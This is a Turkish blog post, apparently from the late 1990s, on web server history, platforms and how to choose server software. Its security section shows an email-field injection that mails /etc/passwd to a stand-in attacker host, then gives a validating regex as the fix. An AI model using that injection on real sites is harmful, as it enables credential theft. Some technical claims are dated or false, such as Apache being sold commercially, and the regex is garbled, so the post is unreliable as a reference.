Web Server

HTTP ve FTP, müşteri bilgisayarla, servis sunan bilgisayarın üzerinde anlaştıkları bir dille (HTML) birbirine ilettikleri talep ve talebin karşılığı olan malzemenin alınıp verilmesinde TCP/IP denilen kurallardan yararlanılarak yapılan iletimi düzenleyen ilkelerdir. Bu ilkelere uygun olarak çıkartılan bir talep Web hizmeti sunan bilgisayar tarafından karşılanır ve karşılık olarak belirli bir bilgi kümesi müşteri bilgisayara iletilir.

Web server olarak tayin edilmiş bilgisayarda, kendisine gelecek HTTP ve FTP taleplerini anlamasına ve bu talepleri yerine getirmesine yarayan programlar (örneğin Apache Web Server, MS Internet Information Server veya Netscape Web Server) sürekli çalışır vaziyette olur. Bu programların, bilgi alıp-vermenin yanı sıra, elektronik posta alıp verme ve yönlendirme, veritabanlarına erişme ve içinden seçme yapma (Querry, SQL, vb. gibi), kendi sabit diskinde duran bir dosyayı alıp karşı tarafa aktarma (FTP, Gopher, WAIS) veya karşı tarafın vereceği dosyayı alıp kendi sabit diskine kaydetme yeteneği olur.

İlk Web Server programı, yukarıda, HTML dilinin geliştirilmesindeki öncü konumu nedeniyle sözünü ettiğimiz, İsviçre’deki CERN kurumu tarafından geliştirildi; ama kısa zamanda UNIX platformunda, anonim bir tarzda ve ücret ödemeden kullanılabilen bir şekil aldı. NCSA Server, National Center for Supercomputing Applications-Superbilgiişlem Uygulamaları Ulusal Merkezi adlı, şimdi kapanmış olan kurum tarafından UNIX işletme sistemi için geliştirilmişti. NCSA Server’ın geliştirilmiş şekli olan Apache Server ise uzun süre ücretsiz dağıtıldıktan sonra günümüzde ticarî olarak geliştiriliyor ve satılıyor. Bugün halâ NCSA Server veya Apache’nin ücretsiz sürümlerine dayalı Web alanları bulunmakla birlikte, Sun Solaris, IBM AIX ve diğer UNIX sistemleri için geliştirilmiş çok sayıda Web Server hizmete girmiş durumda. Kişisel bilgisayarların UNIX gerektiren bilgisayarlara oranla daha ucuz olması, Microsoft’un NT, IBM’in OS/2 işletme sistemlerinin UNIX’e ciddî rakip haline gelmiş bulunmaları nedeniyle, bu sistemlere dayalı Web Server programları da hızla artıyor. Apache Web Server’ın bile NT sürümü piyasaya çıktı.

NT Workstation ve Windows 95/98, aslında Kişisel Web Server adı verilen, Internet’e 24 saat bağlı olmadan, başka bir firmanın ev sahipliği yaptığı Web alanlarına hizmet sağlayabilir. Hatta NT Workstation, aynı anda 10’u geçmemek üzere, 24 saat süreyle ınternet’e bağlanabilecek ve müşteri taleplerini karşılayabilecek yetenektedir. Aynı anda daha fazla Internet bağlantısını kaldırmak istiyorsanız, NT’nin Server sürümünü edinmeniz gerekli. IBM’in OS/2 işletim sistemi ise, Internet Connection Server adlı paket kurulduğu zaman, bir PC’nin fiziksel olarak kaldırabileceği kadar Internet bağlantısına cevap vermesini sağlamaktadır. Macintosh bilgisayarları için Starnine firmasının MacHTTPd programı gibi, ücretsiz edinilebilecek http4Mac ve EasyServe adlı programlarla, Internet servisi sağlamak mümkün.

Ayrıca, bugün PC’lerde de UNIX işletme sistemi kurmak hem kolay, hem ucuz hale gelmiş bulunuyor. Solaris, BSDI, Esix, SCO UNIX bu alandaki ticarî programlar. Ayrıca Linux ve FreeBSD adlı, ücretsiz dağıtılan UNIX işletme sistemleri de, ticarî olanları aratmayacak niteliklere sahip. Ayrıca bu tür ücretsiz programlar, Apache Web Server’ın ücretsiz sürümünü de içeriyorlar.

Bir PC ile Web Server hizmeti yapacaksanız, önünüzdeki bir çok seçeneğe rağmen, başarınızın PC’nin gerçekten sabit disk alanı ve belleği bol olmasına bağlı bulunduğunu hatırlamalısınız. PC’lerin, Internet’in gerektirdiği en önemli özellik olan aynı anda birden çok iş yapabilme becerisi, işletim sistemi kadar, donanım kaynaklarının genişliğine bağlı olduğunu unutmamalısınız.

Bir Web Server yazılım paketi seçerken dikkat edilmesi gereken bir kaç ilkeyi sıralayalım:

  1. Yazılım paketi yeterli güvenliği sağlayacak özelliklere sahip olmalıdır. Binalarda bir odadaki yangının yandaki odaya sıçramasını önleyen ateşe dayanıklı duvarlardan (Firewall) esinlenerek adlandırılan bir dizi program, Web Server yazılımının bulunduğu bilgisayarın, kötü niyetli kişiler tarafından bozulmasına engel oluyor. Ancak Web Server’ın kendi içinde mevcut güvenlik önlemlerinin neler olduğunu dikkatle araştırmanız gerekir. UNIX işletme sistemi ve ona bağlı çalışan Web Server programlarının daha güvenli olduğuna ilişkin, kimi zaman Web tasarımcısını ve Internet hizmet sunucusunu rahatlatan, yaygın bir söylenti vardır. Bu doğru değil. Ne türü olursa olsun, UNIX de bir işletme sistemidir ve el elden üstündür. Kötü niyetli bir kişi Windows NT sistemine verebileceği zararı, aynı rahatlıkla UNIX’e de verebilir. Bir diğer yaygın ve aynı ölçüde yanlış inanç ise NT’nin güvenli olmadığıdır. Microsoft firmasının NT’nin 4’ncü sürümünü güncelleştirmek için dağıttığı SP3 adlı tamir programının yerleştirilmesinden sonra, NT sistemleri güvenlik açısından herhangi bir başka işletme sistemiyle boy ölçüşebilir hale geldi. Burada önemli olan, Internet’e açılmanın, iyi niyetli-kötü niyetli herkese açılmak olduğunu unutmamaktır. Özellikle form denilen, HTML’in ziyaretçi bilgisayarın evsahibi bilgisayara talepten başka şeyler göndermesine imkan veren etiketlerini ve ona bağlı CGI (Common Gateway Interface-Ortak Geçit Arabirimi) adı verilen ziyaretçinin ev sahibi bilgisayardaki programları harekete geçirebildiği buluşma noktasında yer alacak programları tasarlarken, daima kötüniyetli kişileri dikkate alarak hareket etmek gerekir. Internet’te güvenliğin ne kadar kolay sarsılabildiğine ve ne kadar kolay önlem alınabileceğini bir örnek verelim. Sayfanızda, ziyaretçinin doldurması gereken “Elektronik Posta Adresiniz:” diye bir metin kutusu bulunduğunu düşünün. Bu kutuya bütün ziyaretçilerin elektronik posta adreslerini yazacaklarını düşünüyor ve bu bilgiyi işleyecek CGI programında, ziyaretçinin bu kutuya yazacağı bilgiyi, alıp doğruca Web Server’ın “Mail” programına veriyorsunuz. Peki, ya kullanıcı adres yerine [email protected]; mail [email protected]</etc/passwd” yazarsa? Bu basit elektronik posta adresi, sizin Mail Server’ınızın bilgisayar sisteminizdeki bütün password-parola dosyaları Soygun.com’daki “Haydut” isimli arkadaşa postalamasını sağlayacaktır. Oysa, CGI programını yazan kişi, elektronik posta adresini Mail programına gönderirken “unless ($mail_to = ~/^[w-.]+@[w-.]+$)” şeklinde bir satırla, Web ve Mair Server’larla işletme sisteminin “metakarakter” denilen ve bir isim veya adreste değil de sadece komutlarda yer alabilecek karakterlerin bulunup-bulunmadığını denetlerse, sorun kökünden halledilebilecektir.
  2. Mahremiyetin Korunması ve Doğrulatma: Web hizmeti sunan kişi, sadece başkalarının kendi bilgisayar sisteminde arzu edilmeyen şeyler yapmalarını önlemekten değil, aynı zamanda kendisine tevdi edilen başkalarına ait bilgileri de saklamak ve başkalarından korumak zorundadır. Bu bilgiler, ziyaretçinin adı, elektronik adresi, hatta kredi kartı numarası olabilir. Bunlar, sizin Internet’te çizdiğiniz portreye güvenilerek size verilmiş mahrem bilgilerdir. Ziyaretçi bu bilgileri size, kötüye kullanılmayacağı güvencesiyle vermektedir. Bu bilgilerin korunması, sizin birinci derecede sorumluluğunuzdadır. Aynı bağlamda, Web hizmeti sunan kişi olarak, sizin de bu bilgilerin kolayca ve başkalarına açık hale getirilmeden doğrulatılmasına ihtiyacınız olacaktır. Web Server programınız, örneğin kredi kartı numarasını, yeni programlar edinmeye ihtiyaç kalmadan doğrulatabiliyor mu? Yeni bir kredi kartı firmasının çıkartacağı elektronik alış-veriş yöntemi, sizin Web Server’ınıza kolaylıkla uyarlanabilir mi? Microsoft gibi, IBM gibi firmaların paket program olarak sundukları Web Server’lar, çoğu zaman bu firmaların protokollerini tanıyan her türlü ek programı kabul ederler. Oysa Internet’ten ücretsiz olarak edinilebilecek bir Web Server programı, belki maliyet açısından çok daha uygun görülebilir, ama daha sonraki ekleri kabul edemez.
  3. Web Server, sizin Internet sayfalarınızı ziyaret edecek kişilerin bilgisini doğru tutuyor mu? Web hizmeti sunan kişi olarak, kimin hangi sayfadan sizin sayfasına atladığını bilmek, kendi sayfanızın reklamını bu sayfalarda daha çok yapmanıza imkan verir. Özellikle elektronik ticarete dayalı veya mesajını daha çok sayıda kişiye iletmek amacıyla hazırlanan Web alanlarını işletenlerin, sayfalarının varlığını duyurmak için, mümkün olan her yoldan yararlanmaları gerekir. Web Server, size bu kolaylıkları sağlamalıdır. Web Server, kimin hangi tür bilgileri edinmek istediğine ilişkin rapor tutmalıdır. Bu raporu incelemekle, Web alanınızda hiç talep edilmeyen bilgilerden çok, talep edilen alanlarda daha çok bilgi sunabilirsiniz.
  4. Web Server programıyla ilgili teknik destek ve sorun çözme hizmeti alıp almamak, programın seçiminde belki de en önemli unsur sayılabilir. Özellikle başlıca işi bilgisayar mühendisliği olmayan bir hizmet sunucu, yazılımın donanımla uyumunu sağlamada karşılaşabileceği güçlükleri, ancak yazılımı piyasaya süren firmanın teknik servisinden veya o yazılımla ilgili uzmanlığı olan danışmanlardan sağlayabilir. Piyasada hiç tanınmayan veya Internet’ten ücretsiz olarak edinilebilen–dolayısıyla belirli bir firmanın malı olmayan—Server programları, çoğu zaman gerekli teknik destekten de mahrumdur. Buna karşılık büyük yazılım firmalarının programları, firmanın kendi mühendis ve uzman kadrosu, ve buna ek olarak bu programlara destek sağlayarak hayatını kazanan kişiler tarafından en ince ayrıntılarına kadar bilinmektedir. Bir gece yarısı çöken Web Server’ı yeniden çalıştıramamanın bedeli, o programın ilk maliyetinden çok daha yüksek olabilir.
Advertisements

Yazar: Ömer M.

Kim ki bize anlatır kendini? Hatırlatmıyorsa bir kişi kendini unuttu diye kınamamalı hiçbir kimseyi.

Düşüncenizi belirtin